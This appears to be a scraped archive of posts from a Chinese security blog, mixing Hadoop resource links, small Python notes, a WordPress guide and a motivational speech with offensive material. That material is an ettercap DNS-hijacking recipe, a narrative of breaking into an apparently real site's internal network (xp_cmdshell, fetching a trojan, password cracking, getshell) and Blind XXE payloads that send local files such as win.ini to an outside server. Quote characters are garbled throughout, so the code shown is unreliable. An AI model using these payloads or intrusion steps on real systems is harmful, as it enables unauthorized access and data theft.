知乎专栏：/striker
JimmyZhou带队，带上phithon、sco4x0、xd_xd、balablabalablabala~
Hadoop2.x 深入浅出企业级应用实战视频下载
链接: /s/1c0g8K2c 密码: q9en
Hadoop新手入门视频百度网盘下载[全十集]
链接: /s/1sjn9QDB 密码: fhtp
2012年Hadoop与大数据技术大会PPT资料
后面的都乱七八糟的,
　1、《Hadoop技术内幕：深入解析Hadoop Common和HDFS》下载地址：http://download.csdn.net/detail/w43259。
　　2、《Hadoop技术内幕：深入解析MapReduce架构设计与实现原理》下载地址：http://download.csdn.net/detail/w43279。
　　3、《Hadoop技术内幕：深入解析YARN架构设计与实现原理》，下载地址：http://download.csdn.net/detail/w30779。
　　4、《Hadoop分布式文件系统》，这是一篇英文论文，下载地址：http://download.csdn.net/detail/w43301。
　　5、《Hadoop in Practice》，这是英文，没有找到中文版的，下载地址：http://download.csdn.net/detail/w43349。
　　6、《Hadoop in Action》,这也是英文文献，中文版的见下面，下载地址：http://download.csdn.net/detail/w43445。
　　7、《Hadoop Operations》，这也是英文文献书不错，可惜只找到英文的，下载地址：http://download.csdn.net/detail/w43455。
　　8、《Hadoop.The.Definitive.Guide.3rd.Edition》，权威指南第三版，这是目前最新的权威指南，不过第三版只有英文版的，下载地址：http://download.csdn.net/detail/w43477。
　　9、《Hadoop权威指南(第2版)》，这是目前最新中文版Hadoop权威指南，这本书还不错，不过个人感觉翻译的不怎么样，下载地址：http://download.csdn.net/detail/w43527。
　　10、《Hadoop实战第2版》，这是陆嘉恒（机械工业出版社）写的，只有前三章，下载地址：http://download.csdn.net/detail/w43579。
　　11、《Hadoop实战-陆嘉恒》，书比较入门级，入门的人可以看看，下载地址：http://download.csdn.net/detail/w43691。
　　12、《Professional Hadoop Solutions》，可以翻译成是Hadoop专业解决方案，还没有中文版，目前国内有人在翻译，不建议没有基础的人学，下载地址：http://download.csdn.net/detail/w43615。　　　　13、《实战Hadoop：开启通向云计算的捷径(刘鹏)》，下载地址：http://download.csdn.net/detail/w44263。
　　14、《2012年Hadoop与大数据技术大会PPT资料》，不久前召开了Hadoop大会，不过我没有找到那些PPT，只分享一下去年的吧，下载地址：http://download.csdn.net/detail/w61107
　　15、《高可用性的HDFS:Hadoop分布式文件系统深度实践》下载地址：http://download.csdn.net/detail/w30459。
　　16、《MapReduce Design Patterns》，网友推荐的一本书，据说很不错，下载地址：http://download.csdn.net/detail/w62511
　　17、《Hadoop.The.Definitive.Guide.4rd.Edition》，Hadoop权威指南第四版，这是目前最新的权威指南，只有英文版的，下载地址：
在公司主要做后门分析,经常会批量删除白文件,
于是就写了一个简单的Python来删除文件
删除文件本地操作速度还算够快,不需要多线程,基本删除四五千文件就十几秒的样子
代码在下面,新人写的代码,大神不要喷 XD
#!/use/bin/env python
#&-*- coding: utf-8 -*-
__version__ =&'1.0'
__author__ =&'Striker'
__doc__ =&&&&
Striker's LOFTER
by Striker #
for Python 2.7
#使用方法：delwhite.py path
#path为要删除的目录
import sys
dicpath = sys.argv[1]
whitefile = open(&white.txt&,&r&)
delfile = open(&delfile.txt&,&w&)
failfile = open(&failfile.txt&,&w&)
for line in whitefile:
&&&&&&& line = line.strip('\n')
&&&&&&& wfile = dicpath +&&\\&&+ line +&'.txt'
&&&&&&& try:
&&&&&&&&&&&&&&& os.remove(wfile)
&&&&&&&&&&&&&&& delfile.write(wfile +&&\n&)
&&&&&&&&&&&&&&& print &Deleting File:&&+ wfile
&&&&&&& except Exception, e:
&&&&&&&&&&&&&&& failfile.write(wfile +&&\n&)
&&&&&&&&&&&&&&& print &Fail:&&+ wfile
whitefile.close()
print &Finshed.&
&&&&函数说明：range([start,] stop[, step])，根据start与stop指定的范围以及step设定的步长，生成一个序列。
range示例:&
&&& range(5)&
[0, 1, 2, 3, 4]&
&&& range(1,5)&
[1, 2, 3, 4]&
&&& range(0,6,2)
xrange&&&&函数说明：用法与range完全相同，所不同的是生成的不是一个数组，而是一个生成器。xrange示例:&
&&& xrange(5)
&&& list(xrange(5))
[0, 1, 2, 3, 4]
&&& xrange(1,5)
xrange(1, 5)
&&& list(xrange(1,5))
[1, 2, 3, 4]
&&& xrange(0,6,2)
xrange(0, 6, 2)
&&& list(xrange(0,6,2))
由上面的示例可以知道：要生成很大的数字序列的时候，用xrange会比range性能优很多，因为不需要一上来就开辟一块很大的内存空间，这两个基本上都是在循环的时候用：
for i in range(0, 100):&
for i in xrange(0, 100):&
&&这两个输出的结果都是一样的，实际上有很多不同，range会直接生成一个list对象：
a = range(0,100)&
print type(a)&
print a[0], a[1]&
&&&&&输出结果：&
&type 'list'&
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99]
&&&&&而xrange则不会直接生成一个list，而是每次调用返回其中的一个值：&
a = xrange(0,100)&
print type(a)&
print a[0], a[1]&
&&&&&输出结果：&
&type 'xrange'&
xrange(100)
&&&&&所以xrange做循环的性能比range好，尤其是返回很大的时候，尽量用xrange吧，除非你是要返回一个列表。&
应小徒弟文章写这么一篇快速搭建一个博客的文章,
废话不多说,两种方式:
自己买服务器搭建环境+程序
用现有的轻博客,如:点点网 LOFTER等
第二种不多说,本人现在用的博客即为LOFTER,直接注册绑定域名即可~
(文章中仅说明最快速的搭建方法,不考虑安全问题)
0x01 购买服务器
这个不用多说,建议购买linux,不要问我为啥不用win,因为linux逼格高
0x02&搭建web环境
安装步骤参考这里,写的很详细:http://lnmp.org/install.html
这里就不再多说.
0x03&下载Wordpress或其他博客程序并复制到网站目录下
wget&-c https://cn.wordpress.org/wordpress-4.2.2-zh_CN.zip
然后unrar,再mv整个目录到web目录下即可
0x04 安装wordpress
通过web端访问输入数据库账号密码即可
0x05&安装一些常用的插件
比如:将google字体源换成360源的,SEO的,如果没有友情链接安装link-manage,等等...
0x06&安装自己喜欢的主题
主题就是网站的样式,百度有很多的,度娘搜索:wp博客主题
我朋友的一个主题站:/&
0x07 搞定手工
完事就可以发博文啦.
Author:王松_StrikerQQ：Team：安全盒子团队
0x01 安装ettercap
ctrl+alt+T打开命令行，输入：
sudo apt-get install ettercap&
0x02 修改配置文件
sudo vim /etc/ettercap/etter.dns&
在最后一行加入：
*.com A 192.168.1.1*.cn A 192.168.1.1&
IP地址是要把IP解析到的IP
0x03 开始DNS劫持
ettercap -T&-i wlan0 -q&-P dns_spoof ///&///&
&-T文本模式&-i接要欺骗的适配器&-q安静模式&-P dns_spoof调用这个插件&///&///代表所有IP和子网掩码（其他文章中写的是//&但是我测试//不成功&&发现///&三条斜杠就可以劫持了..&各位自行测试啦。）
0x04 停止DNS劫持
(只是为了给文章凑字数,不要打我,233333)&
Author：王松_Striker、柠檬草Team：安全盒子团队Site：前言：注入点是jcms的一个注入点，然后进行注入获取密码以后，安全核心核心成员wefgod对密码进行了逆向（在此感谢wefgod大神），但是登陆后台提示密码错误，各种无解，最终发现注入点可以执行命令，自己鼓捣了很久无果，于是拉上草叔叔，就有了下文，非常精彩的一个过程。。。大神勿喷。0x01撕开内网入口松叔叔给我发了一个sa权限的注入点。条件是：库站分离。ps：也是比较蛋疼的，sqlmap的回显比较慢，虽然可以加上--threads参数提高线程速度，但是还是有些偏慢。其实最不好的处理的是库站分离，而且是在内网里面。xp_cmdshell松叔叔把它恢复好了，然后执行命令就好： master..xp_cmdshell '命令'--思路：1、ftp下载远控2、vbs下载远控但是这一切都需要内网能够连接外网。执行命令，ping了一下百度。
是baidu的保护壳，这证明是ping的通的，于是echo写ftp。
接踵而来的是工具执行一条命令好像会被执行两次...
这就导致ftp不能成功登录。
1、手工在注入点写（可能是工具多执行了一次把？）
2、帐号设置为open ip，这样就可以登录进去，后面的错误命令不会导致出错，可以无视。
最后还是松蜀黍V5的实现了思路1，得到了服务器，我在本地实现了思路2，但是最后不知道为什么还是没有执行成功download到木马。
0x02、内网漫游
setlocal ENABLEDELAYEDEXPANSION
&@FOR /F&&usebackq eol=- skip=1 delims=\&&%%j IN (`net view ^| find &命令成功完成&&/v&^|find
&&The command completed successfully.&&/v`) DO (
&@FOR /F&&usebackq delims=&&%%i IN (`@ping&-n 1 -4&%%j&^| findstr &Pinging&`) DO (
&@FOR /F&&usebackq tokens=2 delims=[]&&%%k IN (`echo&%%i`) DO (echo&\\%%k&&[%%j])
用这个bat跑了一下。大致了解一下内网情况。只有一个工作组
当前我们是处于192.168.2.15这台数据库服务器，根据电脑名猜了一下，可能192.168.212或者192.168.2.14是web服务器。
抓了一发服务器的管理员密码，然后感觉这密码还有点规律啊。
aaa@bbb &其中bbb是电脑名的前缀，然后就是各种构造密码爆破。
其中也试过MSSQL凭据密码获取工具，但是密码还是没获取出来。
对c段的ip扫了一下端口。
天清汉马USG防火墙：
一个web服务器：
手工检测了一下，是有sql注入的，但是没找到后台。
然后就是各种翻服务器文件，找敏感信息。
0x03getshell
松叔叔这时候测试目标站的后台，发现数据库服务器的管理员密码能够登录后台。
是一个jcms系统，wooyun一下。
得到一个shell，然后查看ip的时候，我没有哭。
它就是我已经爆破出来的服务器，而且翻了很久配置文件的服务器。
ps：这不是iis搭建的web，所以我不知道怎么看本地的web配置。
来自群组:&
Author：王松_Striker
Team：安全盒子团队
本文是博主在安装ubuntu之后的一系列操作，其中涵盖：ubuntu安装、更换软件源、安装搜狗输入法、安装WineQQ、安装Nmap、安装SqlMap、安装metasploit、安装Nessus、安装burpsuite、安装OWASP ZAP、安装DirBuster等等，欢迎各位交流。
UBuntu安装方法
首先去Ubuntu官方下载镜像，或者去国内的源下载也是可以的。
然后用WinDiskImager写入到U盘，写入前先格式化U盘。
（一定要用WinDiskImager，好像是因为什么新特性，只有这个软件支持）
写入以后设置电脑BIOS从U盘启动，随后就是一路下一步了。
安装完成Ubuntu以后，首先我会修改成比较快的源，打开软件更新器，这个时候可能会提示你更新软件，那就更新呗，更新完以后点设置，然后源选择其他站点，要么自己选择，要么智能判断最快的服务器：
更换源以后应该会自动更新一下系统软件，如果没有的话，
sudo apt-get update
安装搜狗输入法
首先进入搜狗输入法linux官方：
/linux/?r=pinyin
下载相应的deb包，完事直接双击打开，会默认以Ubuntu软件中心打开，直接点安装即可，
注销再登陆以后即可选择搜狗输入法，然后正常使用。
安装WIneQQ
首先安装wine，按Ctrl+Alt+T打开命令行，执行如下命令安装wine
sudo apt-get install wine
完事去这个网址下载wineqq，
/applications/showimg.php?id=23&lang=cn
下载完成以后，首先解压：
unzip wineqqxxxxxxx.zip
然后cd到解压的目录，然后直接
sudo dpkg -i&*.deb
第一次安装貌似会出错，失败，然后执行：
sudo apt-get install -f
然后再次运行sudo dpkg -i&*即可，
然后搜索QQ即可打开啦～～
直接打开命令行输入:
sudo apt-get install nmap
即可自动解决依赖安装完成，
安装SqlMap
跟安装nmap完全一样。。。
sudo apt-get install sqlmap
我是直接sudo su到root权限下，所以没有输入sudo apt-get install，省去了sudo
下文中可能出现相同的情况，
安装metasploit
直接去官网：/
点击FREE METASPLOIT DOWNLOAD，然后会让你填个人信息，
填信息的时候建议挂一个加拿大的VPN，申请一个gmail邮箱来接受邀请码，
否则会因为什么进出口管制得不到激活码，填完信息以后开始下载。
下载目录选择/opt/目录
先cd切换进/opt/目录，然后sodu su成root权限，
首先给予执行权限：
chmod +x metasploit-laxxxxxx.run
然后执行：
./metasploit-latest-x64xxxxxx.run
即可进入到可视化安装，完事一路下一步即可。
安装完成以后进入：
http://localhost:3790
可能会提示https证书不安全，添加例外就可以了。
然后输入一个账号密码，这个账号密码是在本地web端登陆msf的账号密码，
随后会让输入激活码，去填表的那个email即可看到激活码，
激活即可。
安装Nessus
Nessus是一款比较不错且免费的漏洞扫描工具，
博主灰常喜欢，安装方法如下：
首先去官网下载相应的安装包
/products/nessus/select-your-operating-system#tos
我这里选择：
Ubuntu 11.10, 12.04, 12.10, 13.04, 13.10, and 14.04 AMD64
File:MD5: 59baef16dbe024b&&&&
下载成功以后，输入如下命令进行安装：
sudo dpkg -i Nessus-6.4xxxxxxxxx.deb
安装完成以后运行：
/etc/init.d/nessusd start
开启服务，随后即可进入web gui端：
https://localhost:8834
然后同样是各种注册过程，中途需要去这里注册获取注册码：
/products/nessus/nessus-plugins/obtain-an-activation-code
完成以后就安装ok了～初次访问会下载自动下载一些插件和更新，等待即可。
安装Burpsuite
在freebuf上找了一款1.6版本的，
/s/1kTiGgVP
解压密码是freebuf
首先下来这个文件，Burpsuite需要java支持，
所以先安装java环境，
打开命令行，输入：
sudo apt-get install default-jre
安装完成后即可，
然后解压文件，给BurpLoader.jar执行权限，
chmod +x BurpLoader.jar
java -jar BurpLoader.jar
这就可以运行了，但是为了更加简单的访问burpsuite，
所以我们进行如下操作，将burp复制到/opt/burpsuite/目录：
mv brup1.6 /opt/
mv brup1.6/ burpsuite
看着那个brup的名字就别扭-&-&原谅我是强迫症，
然后执行：
vim /usr/bin/burpsuite
输入a，进入到编辑模式，文件内容输入：
#!/bin/bashjava -jar&/opt/burpsuite/BurpLoader.jar
然后按esc，再:wq保存，
最后再给新建的这个文件执行权限：
chmod +x&/usr/bin/burpsuite&
然后在命令行直接输入burpsuite即可打开软件～
到此burpsuite安装完毕。
安装OWASP ZAP
首先去官网的git下载
/zaproxy/zaproxy/wiki/Downloads
下载linux版的咯，然后解压，
tar -zxvf ZAP_2.4.0_Linux.tar.gz
进入这个目录，就可以看到zap.sh
而且默认有执行权限，./zap.sh就可以打开了。
但是为了方便，还是要做一遍类似于burpsuite的操作，让他更容易打开。
mv ZAP_2.4.0 /opt/
再给ZAP大写的改个名字！不要问我为什么，还是因为强迫症！
mv ZAP_2.4.0/ zap
然后创建文件：
vim /usr/bin/zap
#!/bin/bash/opt/zap/zap.sh
然后再给他执行权限
chmod +x&/usr/bin/zap
完事就可以直接在命令行输入zap然后打开owas zap了～～
安装DIrBuster
DirBuster也是owasp维护的一个扫目录的软件项目，
下载地址：http://sourceforge.net/projects/dirbuster/
下载之后首先tar解压文件：
tar -xf DirBuster-0.12.tar.bz2
然后移动到/opt目录，
mv DirBuster-0.12 /opt/
然后进入opt目录，给Dirbuster目录改个简单的名字。。。还是强迫症。。。再给一下执行权限。。。
mv DirBuster-0.12/ DirBuster
chmod +x DirBuster-0.12.jar
然后再次拿出burpsuite的那招。。。
vim /usr/bin/DirBuster
#!/bin/bashjava -jar&/opt/DirBuster/DirBuster-0.12.jar
然后给他执行权限。。
chmod +x&/usr/bin/DirBuster
然后就可以直接在命令行输入DirBuster打开软件啦～
笔记到此结束。
“安全盒子到底是一个什么样的团队？到底最终是个什么样子？”
我不只一次这样问过自己，始终一个能让自己满意的答案。
最初做技术论坛，只是想提供一个平台给所有热爱的技术的宅男们。
但是后来做着做着，因为很多原因都没有坚持下去。
现在选择做安全盒子科技媒体，
有很多人问我安全盒子到底是干什么的？
其实我自己也不知道
从安全盒子开始到现在，也一共有了6位核心成员
在这个不知道到底是要干什么的团队，待了半年，成为核心。
我想大概要做的是一个“家”吧。
给所有在网络上拼搏努力的人们栖息的一个家。
我记得前几年某论坛做的非常好，我也认为那是一个网络上的家
但是后来逐渐转为商业化&是去了原有的那种感觉
结果走向破裂(在这里没有任何攻击的意味)
那也好,昨天晚上和某团队成员聊起了一些事情
以及价值观和团队整体发展以及管理抉择的很多问题
真的感触蛮多
一个团队的成长&就是在不断改正错误中前进
真的感谢这一路走来在我生命中给予我指导和教育的所有人
说到这里，安全盒子到底是一个什么样的团队
我想也没有那么重要，他只是一个我们所有人共同维护和赖以生存的“家”。
让我们大家可以在网络上找到归属感
不再感到那么孤独
我想这大概就是安全盒子诞生的原因和最终想要变成的样子吧。
安全盒子王松_Striker
原文地址：http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html
&关于XXE,很早之前内部做过分享，个人觉得漏洞本身没太多的玩点，比较有意思主要在于：不同语言处理URI的多元化和不同XML解析器在解析XML的一些特性。
在科普Blind XXE之前，假定你们已经掌握了XXE,了解了 XML, Entity, DCOTYPE, DTD等这些基础知识。
Blind XXE的原理和利用方式我在wooyun上的漏洞报告：&也讲的比较详细，大家可以参考这个实例。
普通的XXE，利用的是通用实体，回显数据，
但是有些时候，我们会发现并没有回显成功，通常有两种情况：服务器禁止了外部实体引用；服务器进行了过滤或者展示限制。
如果是第二种，就可能出现Blind XXE。
一.&参数实体&
大部分人都不了解或者仅仅知道一点关于参数实体的结构。
XXE漏洞中，参数实体通常是无用的（通用实体已经足够），只有当通用实体不再“通用”时，我们就需要使用参数实体了！
XML的规范定义中，只有在DTD中才能引用参数实体.&参数实体的声明和引用都是以百分号%。并且参数实体的引用在DTD是理解解析的，替换文本将变成DTD的一部分。
我们看一个参数实体的示例：
&?xml version=&1.0& encoding=&UTF-8&?&&&!DOCTYPE root [&&!ENTITY&% param1 &&!ENTITY internal 'http://hivesec.net'&&&&%param1;&]&&&root&&&test&[This is my site]&&&/test&&&/root&&
参数实体param1中包含内部实体的声明，用于替代&test&标签中的实体引用参数。
这里，一定要注意流程，参数实体在DTD中解析是优先于XML文本中的内部实体解析。
参数实体有几个特性，这几个特性也决定了它能被利用的程度：
只能在DTD内部&
只能在DTD内部不在赘述;
立即引用即参数实体在DTD中声明后，需要在DTD中完成引用，示例中&%param1;&就是完成了引用；
关于实体嵌套的情况，比较幸运的是DTD中支持单双引号，所以可以通过单双引号间隔使用作为区分嵌套实体和实体之间的关系；在实际使用中，我们通常需要再嵌套一个参数实体，%号是需要处理成&%&&如下：
&!ENTITY % param1 '&!ENTITY&% xxe SYSTEM &http://evil/log?%&&&'&
二. Blind XXE POC
了解了参数实体，Blind XXE的思路就很简单了，最简单的无非是通过参数实体引用，发送一个http请求到我们服务器，然后观察我们服务的日志：
&?xml version=&1.0& encoding=&UTF-8&?&&&!DOCTYPE root [&&!ENTITY&% remote SYSTEM &http://hivesec.net/blind_xxe_test&&&%]&&&root/&&&
尽管解析器会报错（404没东东），但是HTTP请求还是发送出去了。
所以，只要我们服务器有接收到来源于解析服务器的请求，就证明存在XXE漏洞。
三.&漏洞利用:OOB
Blind XEE和普通XXE漏洞的利用方式基本相同：读取文件；DOS；SSRF。
DOS没啥讲的，SSRF就比较多了，不是一两篇文章能讲完的，不仅需要深厚的内功，也需要一定的运气。
所以这里重点讲一下读取文件的数据获取。
和普通XXE相比，Blind的难点在于OOB。通过POC，我们的思路可以通过HTTP请求进行发送，于是很高兴的构造了exp：
&?xml version=&1.0& encoding=&UTF-8&?&&&!DOCTYPE root [&&!ENTITY&% info &1234&&&&!ENTITY&% remote &&!ENTITY&% test SYSTEM 'http://hivesec.net/?blind_xxe_exp=%'&&&&&%&%&]&&&root/&&
但是当我测试时发现并不成功（php dom），这个问题一直没解决。
后来从Timur Yunusov和Alexey Osipov的《XML DATA RETRIEVAL 》paper才了解到，这样的利用方式，一些XML解析器不会处理，解决方案就是再引入1个文件，利用的poc如下, evil1.xml：
&?xml version=&1.0& encoding=&UTF-8& standalone=&no&&?&&&!DOCTYPE root [&&!ENTITY&% remote SYSTEM &/webtest/xxe/oob_poc.xml&&&%&]&&&/root&&
上面引入了一个恶意文件oob_poc.xml，这个恶意文件的内容如下：
&!ENTITY&% payload &1111&&&&!ENTITY&% int &&!ENTITY&% trick SYSTEM 'http://hivesec.net/?oob_poc=%'&&&&%&%&
具体的行为就是，将参数实体%获取的值，通过http请求发送到hivesec.net服务器。
四. OOB实战的一些问题和解决方案&
字符串可以成功导出，不过，当我们在实战中，试图读取本地文件的时候，就会发现了一个问题，通过参数实体引用获取到的数据，并不会进行urlencode，并且解析器对URL有一定限制，只要有回车换行（测试发现php中空格、等制表符也不允许），都会被检查为不合法URL，直接拦截这个请求，所以实战中，这是必须要解决的问题。
在解决这个问题的过程其实蛮有趣的，当然，折腾之后发现老外已经有比较成熟可靠的方案了，这里直接给出php和java OOB的方案：
1. php中，利用php wrapper对数据进行处理（data://,php://）；
&!ENTITY % payloadSYSTEM &php://filter/read=convert.base64-encode/resource=file:///c:/Windows/win.ini&&&&!ENTITY&% int &&!ENTITY&% trick SYSTEM 'http://hivesec.net/?oob_poc=%'&&&&/pre&&&pre&%&%&/pre&&&pre&&
如果服务器安装了expect扩展，那么就非常危险了，这个地方是允许执行系统命令的(Facebook的3w$):
&!ENTITY a SYSTEM 'expect://id'&&
2. java中，低版本可以使用gopher协议，高版本可以使用ftp协议
&!ENTITY % payload SYSTEM &file:///c:/Windows/win.ini&&&&!ENTITY&% int &&!ENTITY&% trick SYSTEM 'gopher:///%'&&&&%&%&&!ENTITY&% payload SYSTEM &file:///c:/Windows/win.ini&&&&!ENTITY&% int &&!ENTITY&% trick SYSTEM '/%'&&&&%&%&
1.&解析器的限制：
.NET的System.XML会自动进行URLencode；
libxml解析器（php,python,ruby）默认限制外部实体长度为2K，并且不处理空格换行符；
java的Xerces2解析器不转换换行符；
2. web服务器URI GET请求，web容器一般都会限制长度(2K or 4k左右)，不过NC可以解决这个问题。
有很多研究过程中碰到的有趣故事，本来想和大家分享的，考虑到大家宝贵的时间，就算了，不过在实战中还是会遇到很多有意思的地方，大家可以去研究研究：
1. URI在不同OS、不同语言支持的协议：比如ldap，win network(&\\10.0.0.1\E$\ivan.txt&)；
2.&不同XML解析库libxml(php,python,ruby),Xerces2(Java), System XML(.NET)的限制（长度，符号）。
个人在用的一款Xss Encode插件,
下载链接: /s/1bntsP1H 密码: 5wsg
【演讲人】于宙
【出处】硅发布
我是大连人，高中就读于大连市二十四中。因为当时学习十分不努力，所以高中毕业后选择了出国留学。这其实是很多本科出国留学的人不能说的秘密，辗转了几个学校，最终毕业于美国印第安纳大学凯利商学院，主修投资和金融衍生品。
上学时迷恋炒股，学习依旧散漫，没能成为一个“放弃了华尔街的高薪工作毅然回国”的海归精英，真的颇为遗憾，因为实在没什么华尔街公司愿意要我。碰巧的是，毕业前两年股市和外汇行情比较好，赚到一点点资本，于是我决定回国做点生意。现在在大连从事餐饮行业，目前拥有4 家芝士蛋糕店和 3 家火烧店。
大学毕业后第一次面对这么多人做演讲，坦率地说，非常紧张。虽然年轻时，我曾畅想很多次，功成名就后，能像我曾经那些偶像一样，和年轻朋友们分享：我是如何从一无所有走上人生巅峰的经验，然后语重心长告诉大家：人活着，不能像一根草，而是要像一棵树，能走到金字塔顶端的只有“雄鹰”和“蜗牛”两种动物，我的成功你也可以复制等等。
可是过了26 岁之后，我忽然意识到一个严肃的问题，就是自己的一生，未必会取得很大成就啊，所以当 TEDxDUFE团队找到我说：没关系，即便你只是一个开小吃店的，我们也愿为你提供这样一个和很多人交流思想的机会时，我的心情是多么激动。因为公司还没上市，所以小草大树、雄鹰蜗牛、睡地板捡易拉罐这样的故事还不到说的时候。今天，只想和大家分享几个困扰了我，和我身边一些朋友十几年的问题，和在经历了一些变故和挫折后，我对这些问题的看法。
努力奋斗真能实现梦想吗？
大家现在可以想象一下汪峰老师坐在转椅上，深情地望着你，对你说：“你的梦想是什么？”周星驰老师的那句：“做人如果没有梦想，和咸鱼有什么区别？”据说也激励了几代人。梦想这个东西是如此重要，简直就是人生一盏明灯。
成功人们成功的原因各不相同，但他们都不会忘记告诉你：无论到什么时候，都不曾忘记梦想，是他们成功的首要原因。以至于我们这一代人，对于人生意义的最通常理解，就在于：坚持梦想并最终实现它。可很少有人愿意面对的一件事是，大部分人的梦想永远，没错，永远都实现不了。
你没听错，大部分人的梦想永远都实现不了。
先和大家分享一个我之前的梦想。上大学时，我热衷于各式各样的赌博游戏，是学校旁边赌场常客。我赌徒生涯的起点，源于赌场里最基本游戏轮盘赌，轮盘上1 到 36 个数字和两个 0，赔率是 1 赔 36。1到 36 分为红黑两色，押注红黑的赔率是 1 赔1。
作为一个合格接受过九年义务教育的人都知道：每一次轮盘开始转动的那一刻，都是一次纯粹独立随机事件。但是赌博这件事的魅力就在于：当你真正身处赌场，看到已连续 4 次开出红色的时候，几乎所有人，都会想把筹码压在黑色的那一面。而我当时的梦想，就是破译这其中奥秘。
我最初的策略非常简单，当连续三次开出奇数，就押注偶数，连续三次红色，就押注黑色。难以置信的事情发生了，在我严格执行这个策略的情况下，前几次去赌场不但全身而退，每次都还赚了不少，以至于我产生一种幻觉：也许游戏是有规律可循的，我已经看到人生巅峰就在不远处向我招手。当然，最终的结尾你们一定想到了，在经历过连续18 个偶数，连续开出 21 次黑色后，我把之前赚到的钱都乖乖还给了赌场。
后来我知道，我那个愚蠢的梦想叫做“赌徒谬论”，就不具体展开讲了。但它对我意义深刻，我终于明白了：在纯粹的随机事件面前，一切规律都是无谓的。
生活中的事情，有极个别和轮盘赌一样，属纯粹随机事件，比如双色球。可几乎每一个中了双色球的人都会告诉你，他们花了多少精力去钻研往期号码，研究历史规律，付出多少辛勤努力，最终获得成功。实际上，即使是纯粹由随机性主导的事，只要参与的人的基数足够大，小概率事件总会发生。
有趣的是，几乎所有在随机事件中的受益者，都会把这完全由运气决定的结果，归功于自己努力上。不仅仅是参与者本身，旁观者也会这么认为。再比如，中国好声音的冠军嘛。
我们生活中遇到的所有事情基本可以分为三类：第一类纯粹由随机性决定，比如布朗运动和轮盘赌博；第二类纯粹由能力决定，比如英语六级考试、110米栏之类；第三类，也是我们最常遇到的，由能力和随机性共同决定，比如创业、投资、恋爱或是梦想。
我对励志大师们总告诉年轻人要不惜一切代价追逐梦想感到深深厌倦的原因就在于：大多数人的梦想，虽然不是纯粹双色球，但也绝对是由随机性主导。在强大随机性面前，付出再多辛勤汗水，就好比夜以继日，蹲在轮盘赌旁边渴望参透其中规律。
前面说到中国好声音的冠军，张碧晨那一句“You are my destiny”，听得我也是醉了。但毕竟那一刻，中国又有多少唱歌唱得和她一样好、甚至更好的姑娘，如果真把成为好声音冠军作为一生梦想，一生中都得在痛苦中度过。
我个人很喜欢黄渤，但绝对不会用黄渤作为例子，去激励一个我这种长相差的年轻人不惜一切代价去追逐演员梦，注意是：不惜一切代价。因为无论是唱歌还是演戏，再多的努力，也只能让你变得很优秀，它们并不存在可以量化的评判标准，想成为万众瞩目的明星，随机性的重要程度，都远远大于实力。
我想，一个人在年轻时，做的每一件事情，能清楚地区分：其中随机性所占的比例，并能心平气和地接受它，在我看来就是最宝贵的财富。
那么在你的梦想中，运气又扮演了多重要角色呢？当你深深感知到这件事的随机性也许不会青睐于你，是否还愿意坚持下去呢？对我而言，梦想永远是值得执着追求的，但我可以无比心平气和地接受，它就是永远无法实现。
既然连梦都实现不了，还有什么事情值得努力呢？
去年这个时候，我发过一条微博：这些年我一直提醒自己一件事情，千万不要自己感动自己。大部分人看似的努力，不过是愚蠢导致。什么熬夜看书到天亮，连续几天只睡几小时，多久没放假了，如果这些东西也值得夸耀，那么富士康流水线上，任何一个人都比你努力多了。人难免天生有自怜情绪，唯有时刻保持清醒，才能看清真正的价值在哪里。
这段话在网上疯传，是我始料不及的。更出乎我意料外的是，我在评论中看到了相当一部分骂声，还有人，认真地给我写下了相当深刻的话：“你在拥有自己的光亮时，不要吹熄别人的蜡烛，你不能因为你自己的不喜欢就否定别人。”
很莫名其妙是吧，即使你刚刚听完我上一段关于随机性的看法，你也会知道，我从来都不觉得努力是一件无所谓的事。恰恰相反，我一直相信，在能力没达到一定程度之前，你连面对随机性的资格都没有啊。张碧晨能拿好声音冠军，自然离不开运气，但换成杨幂，评委不但不会转身，可能直接撒腿就跑了。
可现在问题来了，那究竟什么才算是有价值的努力？这可以从我那条微博说起。去年这个时候，我和朋友在琢磨去大庆做点服装生意，决定去考察几个商场。我当时住在北京，因为之前晚上，和朋友在外面玩得比较尽兴，回到家里已经比较晚，担心睡觉睡过头，会错过航班，那晚上就直接在沙发上靠了一晚。
那是我第一次去哈尔滨，十一月份已经很冷，衣服拿得不足，下了飞机冻得头疼。又因为没有提前订票，到了哈尔滨后才买的火车票，发现就只剩站票了。于是，当我一晚上没睡，冻得头晕眼花，又在绿皮火车上站了两个多小时后，抵达大庆的那一瞬间，我觉得自己实在是太不容易了，将来必须要写进回忆录里面。
可是，回头仔细一想，这些所谓的“努力”，对我最终把那个服装生意做好，没有半毛钱关系。更何况，如果我前一天晚上能早点上床睡觉，多准备点衣服，提前在网上把火车票订好，完全可以舒舒服服达到同样目的。?我的那次经历，像是自己二十多年生活中很多事情的缩影，沉溺在对结果没有直接帮助，只是因为自己遭受了一些痛苦的行为中，误以为那就是努力。
当我终于意识到：我并不是唯一曾经把无意义的消耗当作努力的时候，忽然发现，原来生活中我觉得很努力的人，也许没那么勤奋，如果在正确的方向上坚持行动，超过他们也并不困难。
因为我们这一代人对勤奋和努力的理解，几乎清一色来自学校，更精确地说：在前二十多年的生活中，我们眼中最努力的人，就是那些最能拼命看书和做题的人。实际上，这种理解，是极其片面而幼稚的，因为看书和做题本身，都是为一个极其鲜明的目的而存在，就是通过考试。这种勤奋的付出极其纯粹，更多的复习时间，更高的复习强度，一般而言，都可以直接提高考试分数，它们之间的联系鲜明而直接，每个人都看得懂。?
但生活的美妙之处却在于，很多事情在我们没做到一定程度之前，是完全没法理解的。
